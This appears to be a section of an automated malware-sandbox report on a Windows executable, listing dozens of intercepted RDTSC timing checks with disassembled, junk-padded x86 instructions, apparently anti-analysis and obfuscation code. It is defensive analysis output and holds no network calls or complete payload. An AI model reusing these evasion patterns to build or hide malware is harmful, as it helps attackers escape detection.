Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC3411 second address: CC341C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC386A second address: CC386E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC386E second address: CC3874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC39E4 second address: CC39FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD5E912D9F5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC39FD second address: CC3A11 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD5E9559C76h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC3A11 second address: CC3A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC3A15 second address: CC3A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD5E9559C82h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC3A2D second address: CC3A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: CC3A33 second address: CC3A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50027 second address: 6E500CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD5E912D9F4h 0x00000009 and cx, 78D8h 0x0000000e jmp 00007FD5E912D9EBh 0x00000013 popfd 0x00000014 mov dx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov eax, ebx 0x0000001e pushfd 0x0000001f jmp 00007FD5E912D9F7h 0x00000024 xor eax, 34AB004Eh 0x0000002a jmp 00007FD5E912D9F9h 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 push eax 0x00000034 movsx edi, cx 0x00000037 pop eax 0x00000038 mov bl, BCh 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d pushad 0x0000003e mov bh, ah 0x00000040 mov ebx, 1B86926Ah 0x00000045 popad 0x00000046 mov eax, dword ptr fs:[00000030h] 0x0000004c pushad 0x0000004d call 00007FD5E912D9F7h 0x00000052 mov edi, ecx 0x00000054 pop eax 0x00000055 push eax 0x00000056 push edx 0x00000057 movsx ebx, cx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E500CE second address: 6E50108 instructions: 0x00000000 rdtsc 0x00000002 mov dl, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub esp, 18h 0x0000000a jmp 00007FD5E9559C7Fh 0x0000000f xchg eax, ebx 0x00000010 jmp 00007FD5E9559C86h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov cx, 3E83h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50108 second address: 6E5010D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5010D second address: 6E50138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD5E9559C85h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50138 second address: 6E501EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 4242h 0x00000007 push ebx 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebx, dword ptr [eax+10h] 0x0000000f pushad 0x00000010 call 00007FD5E912D9EBh 0x00000015 mov bl, ah 0x00000017 pop edx 0x00000018 pushfd 0x00000019 jmp 00007FD5E912D9F2h 0x0000001e or si, 1B08h 0x00000023 jmp 00007FD5E912D9EBh 0x00000028 popfd 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b jmp 00007FD5E912D9F6h 0x00000030 push eax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FD5E912D9F1h 0x00000038 add ax, 94D6h 0x0000003d jmp 00007FD5E912D9F1h 0x00000042 popfd 0x00000043 mov ah, 30h 0x00000045 popad 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 jmp 00007FD5E912D9F9h 0x0000004d mov edi, eax 0x0000004f popad 0x00000050 mov esi, dword ptr [757806ECh] 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 mov di, ax 0x0000005c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E501EA second address: 6E50207 instructions: 0x00000000 rdtsc 0x00000002 mov bl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop ecx 0x00000009 mov dh, 9Ah 0x0000000b popad 0x0000000c popad 0x0000000d test esi, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD5E9559C7Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50207 second address: 6E5020B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5020B second address: 6E50211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50211 second address: 6E50222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E912D9EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50222 second address: 6E502BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FD5E955AA5Ah 0x00000011 pushad 0x00000012 jmp 00007FD5E9559C7Ch 0x00000017 pushfd 0x00000018 jmp 00007FD5E9559C82h 0x0000001d or ax, 8478h 0x00000022 jmp 00007FD5E9559C7Bh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, edi 0x0000002a pushad 0x0000002b movzx ecx, di 0x0000002e call 00007FD5E9559C81h 0x00000033 pushfd 0x00000034 jmp 00007FD5E9559C80h 0x00000039 xor ah, 00000008h 0x0000003c jmp 00007FD5E9559C7Bh 0x00000041 popfd 0x00000042 pop ecx 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FD5E9559C80h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E502BE second address: 6E502C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E502C4 second address: 6E5031D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD5E9559C7Ch 0x00000008 pushfd 0x00000009 jmp 00007FD5E9559C82h 0x0000000e adc si, 62C8h 0x00000013 jmp 00007FD5E9559C7Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d jmp 00007FD5E9559C86h 0x00000022 call dword ptr [75750B60h] 0x00000028 mov eax, 7668E5E0h 0x0000002d ret 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5031D second address: 6E50321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50321 second address: 6E5033E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5033E second address: 6E503A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push 00000044h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD5E912D9F0h 0x00000015 adc ecx, 6457F9E8h 0x0000001b jmp 00007FD5E912D9EBh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FD5E912D9F8h 0x00000027 and ch, 00000048h 0x0000002a jmp 00007FD5E912D9EBh 0x0000002f popfd 0x00000030 popad 0x00000031 pop edi 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E503A0 second address: 6E503BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E503BB second address: 6E5040F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD5E912D9EFh 0x00000009 sub ax, 73EEh 0x0000000e jmp 00007FD5E912D9F9h 0x00000013 popfd 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b jmp 00007FD5E912D9EAh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD5E912D9EEh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5040F second address: 6E50415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50415 second address: 6E50419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5046D second address: 6E5048A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5048A second address: 6E504C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD5E912D9F7h 0x00000009 sub cx, 942Eh 0x0000000e jmp 00007FD5E912D9F9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E504C6 second address: 6E504F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, eax 0x00000009 jmp 00007FD5E9559C7Ch 0x0000000e test esi, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD5E9559C87h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E504F6 second address: 6E505BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD6579DCB7Bh 0x0000000f jmp 00007FD5E912D9EEh 0x00000014 sub eax, eax 0x00000016 pushad 0x00000017 call 00007FD5E912D9F7h 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f popad 0x00000020 mov dword ptr [esi], edi 0x00000022 pushad 0x00000023 mov cl, EEh 0x00000025 mov di, 9A5Eh 0x00000029 popad 0x0000002a mov dword ptr [esi+04h], eax 0x0000002d jmp 00007FD5E912D9F5h 0x00000032 mov dword ptr [esi+08h], eax 0x00000035 jmp 00007FD5E912D9EEh 0x0000003a mov dword ptr [esi+0Ch], eax 0x0000003d pushad 0x0000003e mov bh, al 0x00000040 call 00007FD5E912D9F3h 0x00000045 movzx esi, di 0x00000048 pop edx 0x00000049 popad 0x0000004a mov eax, dword ptr [ebx+4Ch] 0x0000004d jmp 00007FD5E912D9F0h 0x00000052 mov dword ptr [esi+10h], eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FD5E912D9EAh 0x0000005e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E505BA second address: 6E505BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E505BE second address: 6E505C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E505C4 second address: 6E505FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 25444A73h 0x00000008 pushfd 0x00000009 jmp 00007FD5E9559C88h 0x0000000e sub ch, 00000078h 0x00000011 jmp 00007FD5E9559C7Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+50h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E505FF second address: 6E5062B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD5E912D9F1h 0x0000000a xor ah, 00000016h 0x0000000d jmp 00007FD5E912D9F1h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5062B second address: 6E50631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50631 second address: 6E50635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50635 second address: 6E50639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50639 second address: 6E5068A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b pushad 0x0000000c mov ax, di 0x0000000f mov dh, A9h 0x00000011 popad 0x00000012 mov eax, dword ptr [ebx+54h] 0x00000015 jmp 00007FD5E912D9F8h 0x0000001a mov dword ptr [esi+18h], eax 0x0000001d jmp 00007FD5E912D9F0h 0x00000022 mov eax, dword ptr [ebx+58h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD5E912D9EAh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5068A second address: 6E50690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50690 second address: 6E506E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c jmp 00007FD5E912D9F0h 0x00000011 mov eax, dword ptr [ebx+5Ch] 0x00000014 pushad 0x00000015 push ecx 0x00000016 pushfd 0x00000017 jmp 00007FD5E912D9EDh 0x0000001c adc ecx, 5F91AE46h 0x00000022 jmp 00007FD5E912D9F1h 0x00000027 popfd 0x00000028 pop ecx 0x00000029 pushad 0x0000002a push edx 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E506E6 second address: 6E50721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esi+20h], eax 0x00000009 jmp 00007FD5E9559C7Fh 0x0000000e mov eax, dword ptr [ebx+60h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bx, 6656h 0x00000018 call 00007FD5E9559C87h 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50721 second address: 6E5074C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD5E912D9EAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5074C second address: 6E50752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50752 second address: 6E5079D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c pushad 0x0000000d mov esi, 292B2ADDh 0x00000012 jmp 00007FD5E912D9EAh 0x00000017 popad 0x00000018 mov dword ptr [esi+28h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ebx, 5544F350h 0x00000023 jmp 00007FD5E912D9F9h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5079D second address: 6E50804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 225D0F62h 0x00000008 push edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+68h] 0x00000010 jmp 00007FD5E9559C85h 0x00000015 mov dword ptr [esi+2Ch], eax 0x00000018 jmp 00007FD5E9559C7Eh 0x0000001d mov ax, word ptr [ebx+6Ch] 0x00000021 jmp 00007FD5E9559C80h 0x00000026 mov word ptr [esi+30h], ax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FD5E9559C87h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50804 second address: 6E5088F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD5E912D9EFh 0x00000009 adc ax, 17CEh 0x0000000e jmp 00007FD5E912D9F9h 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ax, word ptr [ebx+00000088h] 0x00000021 jmp 00007FD5E912D9F3h 0x00000026 mov word ptr [esi+32h], ax 0x0000002a jmp 00007FD5E912D9F6h 0x0000002f mov eax, dword ptr [ebx+0000008Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FD5E912D9F7h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5088F second address: 6E508A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E9559C84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E508A7 second address: 6E508BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+34h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD5E912D9EAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E508BE second address: 6E5091B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c pushad 0x0000000d mov ax, F47Bh 0x00000011 call 00007FD5E9559C80h 0x00000016 pushfd 0x00000017 jmp 00007FD5E9559C82h 0x0000001c and ch, FFFFFFF8h 0x0000001f jmp 00007FD5E9559C7Bh 0x00000024 popfd 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov dword ptr [esi+38h], eax 0x0000002a pushad 0x0000002b mov esi, edi 0x0000002d mov ecx, edi 0x0000002f popad 0x00000030 mov eax, dword ptr [ebx+1Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5091B second address: 6E5091F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5091F second address: 6E50933 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50933 second address: 6E509B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD5E912D9F1h 0x00000008 movzx ecx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+3Ch], eax 0x00000011 jmp 00007FD5E912D9F3h 0x00000016 mov eax, dword ptr [ebx+20h] 0x00000019 pushad 0x0000001a call 00007FD5E912D9F4h 0x0000001f pushfd 0x00000020 jmp 00007FD5E912D9F2h 0x00000025 sbb ecx, 6869F678h 0x0000002b jmp 00007FD5E912D9EBh 0x00000030 popfd 0x00000031 pop esi 0x00000032 movsx edi, cx 0x00000035 popad 0x00000036 mov dword ptr [esi+40h], eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push edi 0x0000003d pop esi 0x0000003e movsx edi, cx 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E509B1 second address: 6E50A1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea eax, dword ptr [ebx+00000080h] 0x00000010 jmp 00007FD5E9559C89h 0x00000015 push 00000001h 0x00000017 pushad 0x00000018 call 00007FD5E9559C7Ch 0x0000001d call 00007FD5E9559C82h 0x00000022 pop eax 0x00000023 pop edx 0x00000024 mov dx, cx 0x00000027 popad 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD5E9559C89h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50A1D second address: 6E50A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E912D9ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50A2D second address: 6E50A82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD5E9559C7Eh 0x0000000e nop 0x0000000f jmp 00007FD5E9559C80h 0x00000014 lea eax, dword ptr [ebp-10h] 0x00000017 jmp 00007FD5E9559C80h 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD5E9559C87h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50A82 second address: 6E50AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50AA6 second address: 6E50AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50AAA second address: 6E50AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50AFE second address: 6E50B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50B03 second address: 6E50B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50B26 second address: 6E50B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50B41 second address: 6E50BA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, dl 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e pushfd 0x0000000f jmp 00007FD5E912D9F4h 0x00000014 xor eax, 4F10ED58h 0x0000001a jmp 00007FD5E912D9EBh 0x0000001f popfd 0x00000020 popad 0x00000021 js 00007FD6579DC532h 0x00000027 jmp 00007FD5E912D9F6h 0x0000002c mov eax, dword ptr [ebp-0Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov si, bx 0x00000035 mov edi, 6073AEFCh 0x0000003a popad 0x0000003b rdtsc
